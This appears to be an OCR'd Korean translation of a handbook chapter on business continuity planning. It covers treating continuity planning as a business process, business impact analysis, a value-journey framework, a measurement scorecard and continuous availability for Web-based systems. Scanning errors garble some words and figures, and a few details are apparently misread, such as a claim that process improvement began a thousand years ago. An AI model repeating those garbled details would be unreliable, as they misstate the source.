효과성으로 측정하는것도 있는데 이것들은 화폐로 엄밀하게 환산되지 못한다. 잘 실행되 
는 CP 공정 이 기 관에 기 여할수 있는것 을 보면 다음과 같다. 

• 계 속적 인 장성 과 혁신 

• 거래자 만족도를 개선하는것 

• 사람들의 요구를 보장하는것. 

• 중대 한 처 리과정의 질을 전반적 으로 개선하는것. 

• 실천적인 재정적 측정을 보장하는것 . 

급격한 변화의 접수: CP 공정의 개선 

바로 천여년전부터 관리의 효률을 늘이기 위하여 전문가들은 사업능률개선과 관련한 
학문들을 도입하기 시작했다. 이 학문들은 많은 산업분야와 회사들의 제조공정 및 행정 
업무의 전반과정을 개선하는데 서서히 도입되게 되였다. 이러한 개선노력들의 기초개념 
은 이러한 과정(표 38_1)이 해당 기관들에 있어서 생명력으로 되며 그것이 보다 효과적 
이고 효률적인 과정으로 되는 경우 오유를 크게 감소시키고 해당기관의 생산능률을 증가 
시킬수 있다는데 있었다. 

기 관의 과정 들은 일 련의 순차적 인 활동이 다. 그것 이 전체 적 으로 실행할 때 기 관사명 
의 기 초를 구성하게 된다. 이 과정들은 기 관의 하부구조(개 별적업 무단위，부문，공장 등) 
전반에 걸쳐 서로 얽혀 있으며 기관의 지원구조(자료처리，통신망, 물리적시설，사람 등) 
에 매여 있다. 

CP 공정의 개선과 재구성움직임의 기본개념은 CP 공정의 추동요인과 장애요인(표 38 
_1을 볼것)의 식별이다. 이 추동 및 장애요인은 여 러가지 형 태를 취하며(사람，기술，시 
설 등) 기 관에 급격한 변화를 도입할 때 리해 되 고 고려 되 여 야 한다. 

앞에서 서술한 내용은 계획이 아니라 련속과정으로서의 지속성계획화에 론점을 집중 
하는 문제의 배경으로 된다. 지속성계획화는 기관의 중대과정들을 지원하도록 설계되여 
야 한다. 그러 므로 이 문제 는 CP 에 련속고정방법 을 도입하는 과정 에 사람，기 술，시 설 등 
추동 및 장애 요인을 리해 하고 취 급하는데 따라 생 겨 난것 이 다. 이 것은 회 복계 획 화가 전통 
적 으로 검증되 고 리행되 던 방식 으로부터 사고방식에서의 근본적 이며 급속한 변화를 가져 
왔다. 
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표 38-1 


정 의 


활동 활동* 과정 또는 보조과정에서 진행되는것들이다. 그것은 보통 일개인 또는 한 부서의 단위 
로 수행된다. 활동은 보통 명령으로 문서화된다. 명령은 그 활동을 이루는 과제들을 문서화 
해야 한다. 

성능대조 성능대조는 다른 기관들이 갈은 또는 류사한 조작을 어떻게 수행하고 있는가를 연구함 
으로써 기관의 실지성능을 개선하기 위하여 우월한 생산과 봉사，설계, 장비，과정 그리고 실 
무를 식별하고 리해하며 창조적으로 발전시키는 체계적인 방법이다. 

기관과정개선 업 무과정개선 (BPI) 은 FAST, 과정성 능검 사，과정재설계，과정재 구성 과 같은 방법들을 
리용하여 관리 와 지 원과정 에 서 자체기 능개 선이 일 어 나도록 설계 된 방법 론이 다. 

비교분석 비교분석 (CA) 은 측정항목들을 류사한 대상에 대한 다른 측정항목과 비교하는 행위이다. 

추동요인 추동요인은 과제，활동 또는 과정의 수행을 가능하게 하는 기술적 및 기관적 편의시설/ 
자원이다. 기술적 추동요인의 실례는 개인용콤퓨터, 복사장치，분산형 자료처리，음성응답 등이 
다. 기 관적 인 허 용자의 실례 는 보강，자체관리，통신，교육 등이 다. 

고속분석해결기 법 ( FAST ) FAST 는 그룹의 주의 를 단일 과정 에 집 중시키 는 돌파방법 이 다. 그를은 하 
루 또는 이틀의 회의를 통하여 다음 90일동안의 과정을 어떻게 개선할수 있는가를 결정한다. 
회의가 끝나기전에 관리자는 제안된 개선안을 승인하거나 거절한다. 

미래상태해결 가치를 증가시키기 위하여 연구중의 항목(과정)에 적용될수 있는 교정행위와 변화들 
의 결합 

정보 정보는 분석되고 공유되고 리해된 자료이다. 

주요과정 주요과정 은 보통 기 관구조안에서 여 러개의 겨:'，을 포함하는 과정 이 며 그 동작이 기 관의 
기능에 중요한 영향을 미친다. 주요과정이 너무 복잡하여 활동준위로서 흐름도를 작성하기 
어렵다면 흔히 보조과정들로 분할된다. 

기관 기관은 그룹，회사，협동체，부문，부서，공장，판매소 등이 다. 

과정 과정은 공급자로부터 입력을 받고 거기에 값을 첨가하며 소비자에게 출구하는 활동들이 론 
리 적 으로 련관되 여 있는 순서화된(련결된) 모임 이 다. 

보조과정 보조과정 은 주과정 을 지 원하여 특정 의 목적 을 달성하는 주요과정 의 일부이 다. 

체계 체 계는 어떤 규칙적 인 호상작용으로 일체화되 여 기관적 인 총체를 형성하는 부분품들(하드웨 
어，쏘프트웨어，절차，인간기% 기타자원)의 조립품이다. 그것은 련결될수도 있고 안될수도 
있는 련판과정들의 모임이다. 


과제 과제 는 어 떤 활동의 개 별적요소 또는 부분모임 이 다. 보통 과제 는 항목이 특정한 분담을 어 떻 



급속한 변화가 요구된다 


경 영 진의 의 식성은 높지 만 CP 실행효과성 이 낮은것은 일관하고 의의 있는 CP 측정 이 
없는것과 관련되는것으로서 그것은 회복계획화책임을 리행 하는 방식에서의 급속한 변화 
를 요구하고 있다. 1980년대 와 1990년대의 대 형 콤퓨터지 향재 해 복구 ( DR ) 계 획 을 개 발하는 
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데 리 용된 기 술은 그 방법 론에 따라 5〜7단계 로 구성 되 였 다. 그것 은 회 복계 획작성 자에 게 
다음과 갈은것을 요구하였다. 

1. 계획림과 계획개 발을 위한 하부구조지원을 확립하는것. 

2. 위협 및 위험관리재검토를 조직하여 회복계획에서 취급되여야 할 가능한 위협환 
경을 식별 하는것 . 

3. 업 무영 향분석 ( BIA ) 을 조직하여 시 간을 다투는 업 무용응용/망을 식 별하고 우선시 
하며 최대허용고장시 간을 결정하는것. 

4. BIA 에서 요구되는 회복우선권과 회복시 기를 효과적으로 취급한 해 당한 회복대 안 
을 선 택하는것 . 

5. 회복계획을 문서화하고 실현하는것. 

6. 지속적 인 검사 및 보수전략을 확립 하고 도입하는것. 

전■적인 재해복구계획화방법의 결함 

낡은 방법은《온실》대형콤퓨터 하부구조의 재 해복구가 표준으로 될 때 에는 잘 동작 
하였다. 지 어는 발전하는 분산형/의뢰기/봉사기체계 들을 총체 적 인 회 복계 획화하부구조로 
통합하는 경우에도 상당히 잘 동작하였다. 그러던 기관이 업무단위회복계획화와 관련될 
때에는 전통적인 DR 방법이 업무단위/기능회복계획을 설계하고 실현하는데서 비효률적이 
였다. 기 업 체전체범위의 회 복계 획 을 실현하려 고 할 때 1차적 인 관심사는 기능적 인 호상 
의 존성 에 대 한 문제 였 다. 회 복계 획작성 자들은 업 무단위 와 기 능들사이 의 호상의 존성 과 업 
무단위와 그 내부의 시간을 다투는 기능을 지원하고 기술봉사사이의 호상의존성을 식별 
하는데 사로 잡혀 있었다. 

호상의존성들 장악하지 못한다 

CP 목적 을 위하여 부서 별 호상의 존성 을 장악하는 능력 은 극히 어 려우며 이 를 위한 
대 부분의 방법 들은 비효률적이 였 다. 여 러 가지 환경 으로 하여 호상의 존성 을 계 속 장악하 
고 있기는 어 렵 다. 호상의존성에 영 향을 미치는 환경은 대부분의 현대기관들이 겪고 있 
는 급격한 변화속도이 다. 여 기 에는 재조직화/구조조종，사람배 치，경쟁 환경변화，해외조달 
이 속한다. 기관구조가 변할 때마다 CP 는 변해야 하며 호상의존성이 다시 평가되여야 한 
다. 즉 변화가 빠를수록 CP 개혁이 더디게 진척된다. 일련의 기능호상의존성이 장악되지 
못할수 있기때문에 CP 무결성은 상실되였으며 CP 의 전반적기능은 손상되였다. 이러한 난 
처한 문제에 대한 답은 쉽지 않은것 갈다. 

호상의존성은 업무과정이다 . 

왜 호상의존성이 관심사로 되는가, 호상의존성이란 무엇인가. 넓은 의미에서 호상의 
존성은 기관의 업무과정들이며 그것들은 기관의 사명을 수행할수 있도록 작용해야 하기 
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때문에 관심사로 된다. 업무과정의 관점에서 회복계획화의 난점들을 대하면 호상의존성 
을 놓치는것과 관련된 문제들을 상당한 정도로 완화시 킬수 있으며 또한 회복계획화노력 
의 초점을 기관의 가장 중요한 요소에 집중시키도록 할수 있다. 기관에서 시간을 다투는 
업무과정들이 어떻게 구조화되는가를 리해하는것은 과정들을 업무단위/부서들로 넘길 때， 
기술적인 체계들과 망，시설，중요기록들，사람 등을 지원할 때 그리고 재조직화 및 변화 
기 간의 과정들을 장악할 때 회복계 획작성 자를 도와 줄것 이 다. 

지속성계획화의 공정법 


메 인 프레임 위주의 재 해 복구계 획 화에 대 한 전통적 인 방법 은 기 관의 기 술적 및 통신 
가동환경들을 회복할 필요를 강조하였다. 오늘 많은 회사들이 기술회복으로부터 벗어 나 
우선권이 있는 업무과정의 지속성과 특정한 업무과정회복계획을 개발하는 방향으로 전환 
하고 있 다. 많은 대 규모협 동체 들은 과정 재 구성/개 선질서를 리 용하여 기 관의 전반생 산성 을 
높이 고 있다. CP 그자체는 하나의 과정 으로 고찰되 여 야 한다. 그림 38-1 은 기 업체범위 
의 CP 공정구조를 어 떻게 보아야 하는가에 대 한 그라프적표시 이 다. 

이러한 업무계획화방법은 다음과 갈은 4가지 전통적인 지속성계획화질서를 공고화 
한다. 


1. IT 재해복구계획 화 (DRP) 전통적인 ITDRP 는 집중형 및 분산형 IT 능력들과 음성 
및 자료통신망지원봉사를 포함하여 기 관의 IT 하부구조에 대 한 지 속성 계 획 화요구 
를 취급한다. 

2. 업무운영재개시계획화 (BRP) 전통적인 BRP 는 기관이 자기들의 지지자원 ( IT , 통신 
망，시 설，외 부중계관계 등)에 접 근하지 못하는 경 우 기 관의 업 무운영 (결산，구입 
등)의 지속성을 취급한다. 

3. 위기관리계 획화 (CMP) CMP 는 의뢰 기 관이 효과적 이 고 효률적 인 기 업체범위의 비 
상사태/재해대응능력을 개발하도록 하는데 기본을 두고 있다. 이 대응능력은 적절 
한 관리 진을 구성 하고 그 성 원들을 엄 중한 회 사비 상사태(폭풍，지 진，홍수，화재， 
해 킹 및 비 루스위 험 등)에 대 응하도록 훈련시키 는것 을 포함한다. CMP 는 또한 위 
기 나 재 해대응기 간에 직원들의 생명 보호문제들도 포함한다. 

4. 련속리용성 (CA) 우에서 설명한 기 타 CP 요소들과는 대 조적 으로 매 일 M 시 간 매 
주 7일 가동환경 에 서 하부구조지 지 자원의 복구시 간목표 ( RTO ) 는 령 시 간으로 줄었 다. 
즉 의뢰기관은 사소한 재정적(수입손실，추가비용) 및 운영상(거래자봉사，신용손 
실) 영향을 받지 않으면 매우 짧은 시간동안조차도 운영능력을 잃어 버릴수 없다. 
CA 봉사는 지 원하부구조의 최고가동시 간을 99% 또는 그이상으로 유지 하는데 초점 
을 두고 있다. 
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기업전반적인 리용성 
기반구조와 방법 



CP 공정개선환경에로의 이행 


경로도표륜곽과 고준우 I CP 공정방법 

그림 38 — 2 에서 보는바와 같이 CP 공정을 개별적인 보조과정요소로 분할함으로써 실 
천적 인 고준위 CP 공정개선방법을 검증해 볼수 있다. 

6개 의 지 속성계 획화업 무과정 의 기 본요소를 아래 에 서 술한다. 

현재상태평가 / 전진평가 . 그림 38_2 에서 보는바와 갈은 기업체범위의 지속성계획화방 
법 을 리해하면 지 속성계 획화공정 의 《 건강》정 도를 측정할수 있 다. 이 과정 의 기 간에 현 
재의 지속성계획화업무보조과정이 전체 효과성을 측정할수 있도록 평가된다. 때때로 격 
차분석기법을 리용하여 현재상태와 희망하는 미래상태를 리해하고 그 다음 현재상태와 
미래상태사이의 사람，과정，기술장애 요인과 추동요인들을 리해하는것이 유용하다. 그림 
38 — 3 에 현재상태/미래상태상상도를 보여 준다. 

현상태평 가과정은 또한 기 관이 어떻 게 CP 공정 을 평 가하며 그 성공을 측정하는가를 
식 별 하고 결 정하는것 을 포함한다. 

흔히 세심히 관찰되지 못하면 결과 CP 공정의 실패를 가져 온다. 또한 이 과정에 업 
무영 향분석 (BIA) 을 통하여 전체업 무에 대 한 봉사손실 및 중단의 영 향을 결 정 하기 위하여 
기관의 업무과정들이 검사된다. BIA 의 목적은 업무과정들에 우선권을 부여하고 그 과정 
들의 회복과 지원자원의 회복에 대한 복구시간목표 (r TO) 를 배당하는것이다. 이러한 활동 
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과정위험과 영향기준선. 이런 과정기간에 잠재적인 위험들과 약점들이 평가되며 전략 
과 프로그람이 개발되여 그러한 위험들을 완화시키거나 제거한다. 복자적으로 진행하는 
위험관리재검토 ( RMR ) 는 일반적으로 기관의 물리적，환경적 및 정보능력의 보안을 검토 
한다. 일 반적 으로 RMR 는 다음과 같은 분야를 식 별 하고 론의해 야 한다. 

• 잠재적인 위협 

• 물리적 및 환경적보안 

• 정보보안 

• 시간을 다투는 지원기능의 회복가능성 

• 단일점고장 

• 문제 및 변경관리 

• 업무중단 및 추가비용보험 

• 싸이트외부의 보관계획 등 

전략개발. 이 과정은 CP 난문제들에 대한 가장 정확한 회복대 안을 식별하고 문서화하 
기 위한 한번 또는 여 러번의 토론회 들을 가지 는 과정 이 다(실 례 로 IT 련속성 목적 으로 강력 
한 싸이트가 요구되는가를 결정하는것，추가적 인 통신회 선이 망결합환경 에 설치되여 야 
하는가，추가적 인 작업 공간이 업 무운영환경 에 필요한가를 결정하는것 등). 우의 위 험평 가 
로부터 얻어 진 정보를 리용하여 장기간의 검사，보수，인식성，훈련 그리고 측정전략을 
설 계 한다. 

지속성계획하부구조. 계 획 개 발기 간 모든 방책들과 지 침，지속성측정，지속성계 획은 형 
식적 으로 문서 화된다. CP 환경 을 구조화하여 계 획소유자와 계 획 관리 점 을 식 별 하며 계 획의 
성 과적 인 개 발을 담보한다. 또한 지속성계 획을 전체 IT 지속성계 획과 위기 관리하부구조에 
종속시 킨 다. 

실현. 이 기 간에 는 지속성 또는 위 기 관리계 획의 초기변종이 기 업체환경 에 걸쳐서 실 
현된 다. 또한 장기 간검 사，보수，의 식 화，훈련，측정전 략들이 실 현된 다. 

운영환경. 이 상태는 지속성 및 위기관리계획의 항시적인 재검토와 보수를 포함한다. 
또한 전반적인 지속성 및 위기관리업무과정의 련속실행가능성의 보수를 필요로 할수도 
있 다. 


어떻게 목적들 달성하는가, CP 가치려행의 개념 


CP 가치려행은 기관의 최고경영진과 회복계획화를 책임진 사람들이 CP 가능성을 공동 
개발하는데 도움이 되는 구조이다. 성과적이며 측정가능한 계획화공정을 달성하기 위해 
서 는 CP 가치 려 행 의 권리 과정 에 서 일 련의 검 사점 들이 고찰되 고 합의 되 여 야 한다. 그 검 사 
점들온 다음과 갈다. 
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• 성공정의 성 공적 인 CP 실 현은 어 떤것 인 가를 정 의 한다. 미 래 상태 는 무엇 인 가. 

• cp 를 업무전략과 함께 세우는것 cp 노력이 업무중심으로 되도록 담보하는 목표 
들을 대 담하게 제시 한다. 

• 개선전략작성 자기기관과 동료기관들이 어디에 있는가를 비교하며 동료기관에 
비하여 자기의 현재 위치에 기초한 기관의 목표를 대조하고 어느 주요창안이 기 
관의 목적을 달성할수 있게 해줄것인가를 분석한다. 

• 가속기로 되는것 기관의 CP 전략과 과정들의 실현을 가속시킨다. 오늘의 환경에 
서 속도는 대규모회사에 있어서 중대한 성공인자로 된다. 

• 결승림을 조직 회사에 CP 평가，개발，실현을 관통시킬수 있는 내부/외부림을 조 
직 한다. 

• 업무요구평가 지 원하부구조에 대 한 시 간을 다투는 업무과정의존성을 평 가한다. 

• 계획의 문서화 시간을 다투는 업무과정들의 리용성을 담보하는데 초점을 둔 지 
속성계획을 개발한다. 

• 사람들을 추동 훈련계획과 명백한 기관구조，상세한 지도 및 관리계획 등과 같 
은 비상시 빠른 반응과 회복을 가능하게 하는 구조를 실현한다. 

• 기관의 CP 전략을 완성 기관의 지위를 잘 타산하여 성공을 담보하는데 필요한 
운영상의 그리고 인사관계의 리정표를 완성한다. 

• 가치전달 미래를 내다 보고 기관변화를 고려하는 동시에 기관의 목표를 달성하 
는데 집중한다. 

• 갱생/개조 새 로운 CP 고정구조와 기 관관리 에 도전하여 리용가능성 과 회 복가능성 
의 난점들을 계속 적응시키 고 만족시 킨다. 

가치려행은 의미 있는 대화를 도와 준다 

경 영 진의 의 식성 수준을 높이 기 위한 이 가치 려행 기 법 은 CP 공정 에 대 하여 의 미 있는 
론의를 쉽게 해주며 결과적인 CP 전략이 실지로 가치를 증가시킨다는것을 담보해 준다. 
후에 고찰하겠지 만 이 가치증가개 념 은 또한 전체 CP 공정 의 성 공이 측정될수 있는 추가 
적 인 측정 량을 제공할것이다. 


기관변경관리에 대한 요구 


우에 서 언급한 CP 공정 개 선방법 과 CP 가치 려행밖에 도 사람지향의 기 관변경관리 ( OCM ) 
개 념을 도입하는것은 성공적 인 CP 공정을 실현하는데서 중요한 문제로 된다. 

H . James Harring ton 은 저 서 《 업 무과정 개 선수첩》에 서 과정 개 선방법 을 적 용하는것 
은 흔히 기 관이 변경 과정 을 조정 하지 않는한 문제거 리 를 발생 시킬수 있 다는것 을 강조하 
였다. 그는 이렇게 서술하였다.《재구성과 갈은 방법들은 우리가 우리의 본보기와 기관 
문화에 도전하고 변경시킬 때에만 성공하였다. 행동방식이나 과정을 운영하는데 책임이 
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있는 사람들을 변경시키지 않고 그 과정을 변경시킬수 있다고 생각하는것은 궤변이다.》. 

사람추동요인과 장애요인을 식별 하는것과 행동방식을 변화시 키는 정확한 실현계획의 
설계 를 포함하여 기관변경관리의 개 념은 CP 계 획방법 을 CP 공정 개선으로 전환하는데서 중 
요한 역할을 논다. 저자는 또한 다음과 같이 지적하였다.《고통관리，변경계획화，공동작 
용 등 변경과정을 관리하는데서 효과적인 여러가지 도구와 기법이 있다. 중요한것은 모 
든 업무과정개선 ( BPI ) 계 획은 그 자체내 에 매우 종합적 인 변경관리계 획을 가지 고 있어 야 
하며 이 계 획 은 효과적 으로 실 현 하여 야 한다는것 이 다. > . 

그러므로 CP 공정의 개념이 기관안에서 발전하는데 따라 적당한 OCM 기술이 전반적 
배 치사업 의 필수구성 요소로서 고찰되고 포함되도록 하는것은 회복계획작성 자의 몫으로 
된 다. 


성공은 어떻게 측정되는가，재점표의 개념 


CP 공정의 개선방법을 더 보완하기 위해서는 기관이 전체 CP 공정의 성공을 평가하는 
데 리용할수 있는 의미 있는 측정 또는 측정량을 확립하여야 한다. 전통적인 측정은 다 
음과 갈다. 

• 비상가동싸이트에서 얼마나 많은 돈이 소비되였는가， 

• 얼마나 많은 사람이 CP 활동에 전문적으로 참가하였는가， 

• 비상가동싸이트검사는 성공인가. 

대 신에 초점 은 기 관의 총적목표를 달성하는데 서 CP 공정 의 기 여량을 측정하는데 집 
중되여야 한다. 이러한 집중에 의하여 가능한 기능들은 다음과 같다. 

• 합의된 CP 개발리정표를 식별하는것， 

• 실행기준선을 확립하는것， 

• CP 공정전달의 정당성을 립증하는것， 

• 경영진이 만족하여 경영사업을 앞으로도 성과적으로 진행할수 있는 기초를 마련 
하는것. 

CP 채점표는 다음의 정의를 포함한다. 

• 가치주장 

• 가치제안 

• CP 위 험 감소에 대 한 측정 지표/가정 

• 실현규약 

• 정 당화방법 
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지속성과정재점표 


질문 : 다음의 지속성과정요소들을 실현하는것으로부터 기관은 사람, 과정，기술，사명 
/소득으로 환산하여 얼마나 덕을 보게 되는가 


지속성망계획화공정요소 

사람 

과정 

기술 

사명/소득 

과정 방법 론 





문서화된 DRP 





문서화된 BRP 





문서화된 위기관리계획 





문서화된 비상대응절차 





문서화된 망복구계획 





기관의 비상대웅연습 





종업원의식화과정 





복구대안비용 





련속리용성하부구조 





지속성검사과정 





기타 






-림 38 — 4와 표 38 — 2는 채 점 표개 념 과 실 현된 CP 공정 의 성 공을 측정 하기 위하 
:수 있는 측정량형태들에 대 한 실례를 보여 준다. CP 공정 이 측정될 새로운 측정 
채점표방법에 속한다. 

채점표방법에 이어 기관은 CP 공정의 미래상태가 어떻게 되여야 하는가를 정의 
4( 앞에 서 소개 한 CP 가치 려 행 을 볼것 ). 이 미 래 상태 정 의 는 기 관의 최 고경 영 진과 ( 
卜부구조의 개발담당자가 공동으로 개발하여야 한다. 그림 38 — 3은 현재상태/미래 








륜곽을 그려 볼수 있다. 


• 장성 과 혁신 

• 고객 만족 

• 사람 

• 과정 의 질 

• 재정상태 

이 측정은 특정 한 문화와 환경 에 기초하여 유일하게 개 발되 여 야 한다. 

Web 기반의 응용에 대한 지속성계획화 


Web 과 Web 관련업무의 출현과 함께 요구되는것은 가동시 간 24 X 7 시 간에 대 한 요구이 
다. 전통적인 복구시간목표들에는 기관의 Web 기반을 지원하는 기업공정들과 자원들이 
들어 있지 않다. 유감스럽게도 지속적인 매일 24시간 매주 7일의 가동시간에 대하여 
Web 기반의 응용프로그람을 간단히 준비한다면 그것은 대책으로 되지 못한다. 응용프로 
그람리용의 가능성문제 가 취 급되 여 야 한다는것 은 명 백하지 만 기 타 Web 기 반의 하부구조 
구성 요소(콤퓨터하드웨 어， Web 기 반의 망，자료기 지파일체 계， Web 봉사기，파일 및 인쇄봉 
사기 그리고 이 모든것들과 관계되는 물리적，환경적 및 정보보안상 우려에 대한 준비 
등)의 신뢰성 과 리용성 이 담보되 여 야 한다는것도 중요하다. 이 하부구조전체를 치명적 인 
또는 부차적 인 붕괴기 간에 리용할수 있도록 준비 한다는 말은 보통 련속 또는 고도리 용성 
을 의 미한다. 

련속리용성 ( CA ) 은 간단히 이루어 지지 않는다. 그것은 조화롭게 계획화되고 실현된다. 
신뢰성 있고 리용가능한 Web 기반의 하부구조에서 열쇠는 하부구조의 매개 요소들이 고도 
의 신축성과 담보성을 가지도록 하는것이다. 이 사실을 실증하여 가트너연구소는 다음과 
같이 보고하였다.《자료기지의 복사，하드웨 어봉사기， Web 봉사기，응용봉사기，종합중개 자/ 
묶음은 응용봉사의 리용성을 증가시켜 준다. 그러나 가장 좋은 결과는 체계의 하부구조에 
대한 믿음외에 응용프로그람 그자체의 설계가 련속리용성에 대하여 고려될 때 달성된다. 
Web 응용프로그람에 대한 련속리용성을 달성하려고 하는 사용자들은 어떤 하나의 도구에 
기초할것이 아니라 응용계획의 매 단계에서 체계적으로 리용성을 고찰해야 한다.》. 

련속리 용성방법 론을 실 현하는것 은 매 일 24시 간 매 주 7일 또는 그에 가까운 리용가능 
성 을 달성 하기 위한 조직 화된 방법 론에 서 열쇠 로 된다. 이 과정 을 업 무과정 요구와 예 상， 
망하부구조(례컨대 인터네트，내부망，외부망 등)의 약점과 위험을 리해하고 단일점고장 
분석 을 리해 함으로써 검 사된 다. 련속리용성 의 실현을 고찰하는 일부로서 기 관은 망하부 
구조와 그 요소들의 신속성과 하부구조관리체 계의 망고장，망구성，망변경취급능력，망리 
용성감시 능력，개 별망요소들의 용량요구취 급능력 을 검 사해 야 한다. 그림 38—5는 이 방법 
들의 도식 적표현 을 보여 준다. 


591 





평가/계획 화 



그림 38-5. 련속리 용성방법 론 

CA 방법론은 Web 기 반의 환경 을 달성하는데서 체계적 인 고찰 및 전진이동방법 이 다. 
매우 높은 준위 에서 이 방법들을 개괄하면 다음과 갈다. 

• 평가/계획하. 이 상태에서 기업체는 업무과정소유자예상/요구조건과 Web 기반의 
업 무과정 을 지 원 하는 기 술하부구조요소들의 현재 상태 를 리해 하기 위 하여 노력 해 
야 한다. 회견기 교(사람 대 사람)와 현재의 체계 및 망자동진단도구를 리용하는 
것 은 리 용성 상태 와 리 용성 우려 사항들을 리 해 하는데 도움으로 될것 이 다. 

• 설계. 현재상태평가에 대한 결과가 주어 지면 련속리용성전략과 실현/완화계획을 
설계한다. 이것은 Web 기 반의 자원지 원에 대 한 접 근과 리용을 승인하는데 필요 
한 관리과정을 분류하는데 리용될수 있는 Web 기반의 하부구조분류체계를 개발 
하는것을 포함할것이다. 

• 실현. 설계단계에서 결정된 설계기술설명서에 따라 현재의 하부구조를 Web 기반 
의 환경으로 완화시킨다. 

• 운영/감시 . Web 기 반의 하부구조에 대 한 전진관리 를 위하여 운영 상 감시 기 술 및 
과정 들을 확립한다. 

이 런 방향에 서 마커 스 ( Marcus ) 와 스런 ( Stem ) 은 자기 들의 저 서 《 고도리 용성 에 대 한 
면밀한 계획: 신축성 있는 분산형체계설계》에서 체계리용성을 최대로 하기 위한 몇가지 
기본규칙을 권고하였다. 

• 자금을 쓰되 맹목적으로 쓰면 안된다. 질보장에는 돈이 필요하기때문에 적당한 정 
도의 회 복능력내 에서 투자가 필요하다. 
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• 아무것도 가정하지 않는다. 그것이 련속리용성에 이르렀을 때는 아무것도 묶여 
있지 않게 된다. 종단간체 계 리용가능성은 제 일 선차적 인 계획화를 요구하며 간 
단히 이루어 질수 없고 적절한 자리에 투하될수 없다. 

• 단일점고장을 제거한다. 만일 사슬에서 단일련결고리가 끊어 지면 다른 련결고리 
가 얼마나 강한가에 관계없이 체계는 주저앉는다. 단일고장을 식별하고 완화시 
킨 다. 

• 엄밀한 보안을 유지한다. Web 기반의 하부구조요소들에 대한 물리적 및 환경적 
정보보안을 보장한다. 

• 봉사기를 공고화한다. 많은 작은 봉사기들의 기능을 보다 큰 봉사기와 많지 않은 
봉사기 에 집 중하여 운영 을 손쉽 게 해 주고 복잡성 을 줄인 다. 

• 일반과제들을 자동화한다. 일 반적 으로 수행 되 는 체 계 과제 를 자동화한다. 운영복잡 
성 을 줄이 기 위하여 실행될수 있고 임의의것도 고도리용성 을 유지 하는데 도움이 
될것이다. 

• 모든것을 문서화한다. 체 계문서 화의 중요성 을 절대 로 과소평 가하지 말아야 한다. 
문서화는 현재와 미래의 체계운영자들에게 문제시되는 체계의 근본적인 운영상 
복잡성에 대한 검사흔적과 지령을 보장한다. 

• 봉사준우 I 협약 ( SLA ) 을 확립한다. 기업체와 봉사제공자예상을 미리 정의하는것은 
가장 중요하다. SLA 는 체계리용성수준과 봉사시 간，위 치，우선권，단계적확대방 
책을 취급해 야 한다. 

• 미리계획한다. 실제적인 사건에 앞서서 비상사태와 위기，다중고장에 대하여 계 
획 화한다. 

• 모든것을 검사한다. 동작에 앞서 생 산환경 에 서 새 로운 모든 응용，체 계 쏘프트웨 어， 
하드웨 어변경 을 검 사한다. 

• 개별적인 환경을 유지한다. 가능하다면 체계들을 분리시킨다. 이 분리는 다음과 
갈은 기능들 즉 생산，생산본보기，품질보증，개발，실험실，재해복구/업무지속성 
싸이트에 대한 개별적인 환경을 포함할수도 있다. 

• 고장분리에 투자한다. 문제 들이 발생할 때 또는 발생 한다면 확대 되 여 다른 하부 
구조요소에 영 향을 미치지 않도륵 문제들을 분리시키는 계 획을 작성한다. 

• 체계의 리력을 검사한다. 체계의 리 력을 리해하는것은 체계를 앞으로 보다 높은 
수준의 회 복능력 으로 끌어 올리 기 위하여 어 떤 작용이 필 요한가를 리 해 하는데 서 
도움이 될것이다. 

• 장성을 우 I 하여 건설한다. 현대콤퓨터시대에는 체계자원의 신뢰성이 시간에 따라 
증가한다. 기 업체 가 체계 자원에 더욱더 의거하는데 따라 체계는 더 커져 야 한다. 
그러므로 체계자원을 현재의 신뢰성 있는 체계구조에 첨가하는것은 예비계획화 
와 작업부담분산과 응용균일화에 대 한 관심을 요구한다. 

• 성숙된 쏘프트웨어를 선택한다. Web 기 반의 환경 을 지 원하는 성 숙된 쏘프트웨어 가 
검사되지 않은 해결방안들중에서 더 바람직하다는것은 두말할 필요가 없다. 

• 신뢰성 있고 봉사가능한 하드웨어를 선택한다. 쏘프트웨어 와 같이 Web 기 반의 환 
경 에서는 평 균고장퇴 치후 시 간이 긴 하드웨 어요소를 선택하는것 이 더 좋다. 
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• 구성을 다시 리용한다. 기업체가 안정한 체계구성을 가지고 있다면 환경전체에 
걸쳐 가능한껏 많이 그것들을 다시 리용하거나 반복한다. 이 방법의 우점은 지 
원이 쉬운것，미 리 검사된 구성，새로운 옮겨 보내기에 대한 고도신용，다량구입 
가능성, 예 비부속품리용가능성 그리고 Web 기반의 하부구조를 실현하고 운영하 
는것을 담당자들이 적게 학습하는것 등이다. 

• 외부자원을 리용한다. Web 기 반의 환경을 실현하고 운영 하고 있는 기관들의 우점 
을 받아 들인다. 다른 경험으로부터 배우는것 이 가능하다. 

• 하나의 문제, 하나의 풀이. 하부구조를 유지 하는데 필요한 도구들을 리해 하고 식 
별 하고 리용한다. 도구들은 일감에 적 합해 야 하며 그것들이 설계 되 는데 따라 획 
득하여 리용하도록 해 야 한다. 

• 단순하게 한다. 단순성 은 Web 기 반의 하부구조를 계 획 하고 개 발하고 실현하며 운 
영하는데서 열쇠로 된다. 조종，경쟁，변화도입에 대한 Web 기반의 하부구조점들 
을 최 소화하기 위하여 노력한다. 

Maraus 와 Stern 의 저서는 고도로 리용가능한 체계 를 준비 하고 실현하는데 필수적 인 
참고서 이 다. 

지속성계획화공정을 재구성하는것은 지속성계획화공정을 재활성화하는것은 물론 
Web 기반의 기업체의 요구와 예상이 련속리용성질서를 실현하는 과정을 거쳐 식별되고 
만족된 다는것 을 담보하는것 을 포함한다. 


요 약 


기관이 자기의 CP 실현에 대한 성공을 측정하지 못한다면 계획개발과 감되의 끊임없 
는 순환이 진행된다. 그 첫째 리유는 정 확한 CP 측정수법 들이 기 관의 미 래 상태 목표에 알 
맞게 도입 되 지 못하였기때 문이 다. 이 런 측정수법 들이 없는것 으로 하여 최 고경 영 진과 CP 
담당자들의 예 상은 흔히 충족되 지 못한다. 《 비 상계 획 화와 관리 /KPMG 지 속성 계 획 화 연 
구》에서 수집된 통계자료는 이러한 주장을 립증해 주고 있다. 이에 기초하여 기관이 CP 
실현을 담당하는 방식 의 급격 한 변화가 필요하다. 이 변화는 CP 에 대 한 업 무과정개선 
( BPI ) 방법 을 도입 하고 리용하는것 을 포함한다. 이 BPI 방법 은 지난 20년동안《 포춘》잡 
지 에 오른 moo 여 개의 최우수회사들에서 성과적 으로 실현되 였다. CP 를 한개 과정으로 정 
의하며 CP 가치려행의 개념을 적용하며 CP 채점표를 리용하는 CP 측정을 확장하며 기관변 
